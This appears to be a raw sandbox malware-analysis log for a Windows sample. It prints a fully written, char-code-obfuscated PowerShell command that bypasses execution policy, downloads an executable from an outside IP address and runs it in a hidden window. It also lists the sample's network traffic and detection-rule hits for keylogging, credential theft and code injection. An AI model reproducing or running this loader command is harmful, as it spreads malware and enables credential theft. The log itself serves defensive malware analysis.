heap_dep_bypass: 1
protection: 64 (PAGE_EXECUTE_READWRITE)
base_address: 0x05044000
allocation_type: 4096 (MEM_COMMIT)
process_handle: 0xffffffff
1 0 0
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe
file C:\Users\test22\AppData\Local\Temp\%ProgramData%\Microsoft\Windows\Start Menu\Programs\Accessories\Windows PowerShell\Windows PowerShell.lnk
cmdline C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe -ex BYPAsS -noNI -W HiddEn $EFGiZIWe = [NET.WebrEQuest]::CreaTe( ([chAR] 104 + [chAR] 116 + [cHAr] 116 + [ChAr] 112 + [chAR] 58 + [cHar] 47 + [cHaR] 47 + [CHAr] 53 + [CHAr] 46 + [chAr] 55 + [CHAr] 53 + [ChaR] 46 + [CHAr] 50 + [cHAR] 52 + [cHaR] 56 + [CHaR] 46 + [CHar] 50 + [chaR] 48 + [chAr] 55 + [Char] 47 + [CHar] 97 + [cHaR] 118 + [CHAR] 105 + [CHaR] 99 + [CHar] 97 + [cHAr] 112 + [char] 110 + [ChaR] 51 + [cHAr] 50 + [char] 46 + [chAr] 101 + [ChAr] 120 + [Char] 101 ) ).GEtResPOnSE( ).COntenTleNgth ; ( New-OBJeCt ( [char] 78 + [chAr] 101 + [CHAr] 116 + [cHAR] 46 + [cHAr] 87 + [ChAR] 69 + [ChAR] 66 + [char] 67 + [cHAr] 108 + [chaR] 73 + [ChAr] 101 + [chaR] 110 + [chAR] 116 )).( [chaR] 100 + [chAR] 111 + [ChAR] 119 + [Char] 110 + [cHaR] 108 + [ChaR] 111 + [CHAR] 97 + [Char] 68 + [CHAr] 70 + [cHAR] 105 + [CHar] 76 + [ChAR] 101 + [cHaR] 97 + [cHar] 115 + [ChaR] 121 + [ChAR] 110 + [cHAR] 99 ).inVOKE( ([chAR] 104 + [cHAr] 116 + [ChAr] 116 + [chAR] 112 + [cHar] 58 + [cHaR] 47 + [CHAr] 47 + [CHAr] 53 + [chAr] 46 + [CHAr] 55 + [ChaR] 53 + [CHAr] 46 + [cHAR] 50 + [cHaR] 52 + [CHaR] 56 + [CHar] 46 + [chaR] 50 + [chAr] 48 + [Char] 55 + [CHar] 47 + [cHaR] 97 + [CHAR] 118 + [CHaR] 105 + [CHar] 99 + [cHAr] 97 + [char] 112 + [ChaR] 110 + [cHAr] 51 + [char] 50 + [chAr] 46 + [ChAr] 101 + [Char] 120 + [CHar] 101 ) , 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) ; If ( TesT-PATh 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ) { dO { $BGyLZQxsIspBheUMTlPoHVXx = ([Io.FIlEINfo] 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe' ).lEnGth } UnTIL ( $BGyLZQxsIspBheUMTlPoHVXx -EQ $EFGiZIWe )} ; "&" 'C:\Users\test22\AppData\Local\Temp\avicapn32.exe'
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe
Time & API Arguments Status Return Repeated

GetAdaptersAddresses

 flags: 15
family: 0
111 0
Data received HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Jan 2023 00:31:39 GMT Content-Type: application/octet-stream Content-Length: 9242736 Last-Modified: Thu, 26 Jan 2023 23:29:00 GMT Connection: keep-alive ETag: "63d30cbc-8d0870" Accept-Ranges: bytes MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL &ùÒcà  f?4±@ _¡…ü܄xÿÇ âŒp&p†öÿÀ0s@.textú  `.rdata4ã0 @@.data# @À.00cfgP @@.tls ` @À.vmp=p @À.voltbl€I.ndex0àœ)I `.ndex1Ä0s@À.ndex2Ðȋ@sʋ `.rsrcÇ ÿԋ@@^¥sjõð¢óF›tœËôa±ž)t¸‡ÎÐóãó €B3Úf…Ս4‹T%…ñ­R;Þf…ìÿæÑÉ÷Ñ;ù3Ùf;ÑéyÕ÷5b¡=U.bèœb´,¶ÃüÉÜÙî[%b% -؝ 0ê۝;ðż
Data sent GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207 Connection: Keep-Alive
Time & API Arguments Status Return Repeated

LookupPrivilegeValueW

 system_name:
privilege_name: SeDebugPrivilege
1 1 0
description Create a windows service rule Create_Service
description Communication using DGA rule Network_DGA
description Communications over RAW Socket rule Network_TCP_Socket
description Take ScreenShot rule ScreenShot
description Communications use DNS rule Network_DNS
description Match Windows Inet API call rule Str_Win32_Internet_API
description Code injection with CreateRemoteThread in a remote process rule Code_injection
description PWS Memory rule Generic_PWS_Memory_Zero
description Record Audio rule Sniff_Audio
description Communications over HTTP rule Network_HTTP
description Steal credential rule local_credential_Steal
description Run a KeyLogger rule KeyLogger
description Communications over P2P network rule Network_P2P_Win
description File Downloader rule Network_Downloader
description Escalate priviledges rule Escalate_priviledges
description (no description) rule DebuggerCheck__GlobalFlags
description (no description) rule DebuggerCheck__QueryInfo
description (no description) rule DebuggerCheck__RemoteAPI
description (no description) rule DebuggerHiding__Thread
description (no description) rule DebuggerHiding__Active
description (no description) rule DebuggerException__ConsoleCtrl
description (no description) rule DebuggerException__SetConsoleCtrl
description (no description) rule ThreadControl__Context
description (no description) rule SEH__vectored
description (no description) rule Check_Dlls
description Checks if being debugged rule anti_dbg
description Anti-Sandbox checks for ThreatExpert rule antisb_threatExpert
description Bypass DEP rule disable_dep
description Affect hook table rule win_hook
description Communications over FTP rule Network_FTP
description Match Windows Http API call rule Str_Win32_Http_API
host 5.75.248.207
Time & API Arguments Status Return Repeated

NtQuerySystemInformation

 information_class: 8 (SystemProcessorPerformanceInformation)
1 0 0
description powershell.exe tried to sleep 5456329 seconds, actually delayed analysis time by 5456329 seconds
Time & API Arguments Status Return Repeated

send

 buffer: GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207 Connection: Keep-Alive
socket: 1416
sent: 75
1 75 0

WSASend

 buffer: GET /avicapn32.exe HTTP/1.1 Host: 5.75.248.207
socket: 1424
0 0
Time & API Arguments Status Return Repeated

recv

 buffer: HTTP/1.1 200 OK Server: nginx/1.18.0 (Ubuntu) Date: Fri, 27 Jan 2023 00:31:39 GMT Content-Type: application/octet-stream Content-Length: 9242736 Last-Modified: Thu, 26 Jan 2023 23:29:00 GMT Connection: keep-alive ETag: "63d30cbc-8d0870" Accept-Ranges: bytes MZx@xº´ Í!¸LÍ!This program cannot be run in DOS mode.$PEL &ùÒcà  f?4±@ _¡…ü܄xÿÇ âŒp&p†öÿÀ0s@.textú  `.rdata4ã0 @@.data# @À.00cfgP @@.tls ` @À.vmp=p @À.voltbl€I.ndex0àœ)I `.ndex1Ä0s@À.ndex2Ðȋ@sʋ `.rsrcÇ ÿԋ@@^¥sjõð¢óF›tœËôa±ž)t¸‡ÎÐóãó €B3Úf…Ս4‹T%…ñ­R;Þf…ìÿæÑÉ÷Ñ;ù3Ùf;ÑéyÕ÷5b¡=U.bèœb´,¶ÃüÉÜÙî[%b% -؝ 0ê۝;ðż
received: 2920
socket: 1416
1 2920 0
parent_process powershell.exe martian_process "C:\Users\test22\AppData\Local\Temp\avicapn32.exe"
option -ex bypass value Attempts to bypass execution policy
option -w hidden value Attempts to execute command with a hidden window
option -noni value Prevents creating an interactive prompt for the user
file C:\Windows\System32\ie4uinit.exe
file C:\Program Files\Windows Sidebar\sidebar.exe
file C:\Windows\System32\WindowsAnytimeUpgradeUI.exe
file C:\Windows\System32\xpsrchvw.exe
file C:\Windows\System32\displayswitch.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\mip.exe
file C:\Windows\System32\mblctr.exe
file C:\Windows\System32\mstsc.exe
file C:\Windows\System32\SnippingTool.exe
file C:\Windows\System32\SoundRecorder.exe
file C:\Windows\System32\dfrgui.exe
file C:\Windows\System32\msinfo32.exe
file C:\Windows\System32\rstrui.exe
file C:\Program Files\Common Files\Microsoft Shared\ink\ShapeCollector.exe
file C:\Program Files\Windows Journal\Journal.exe
file C:\Windows\System32\WindowsPowerShell\v1.0\powershell.exe
file C:\Windows\System32\MdSched.exe
file C:\Windows\System32\msconfig.exe
file C:\Windows\System32\recdisc.exe
file C:\Windows\System32\msra.exe
file C:\Users\test22\AppData\Local\Temp\avicapn32.exe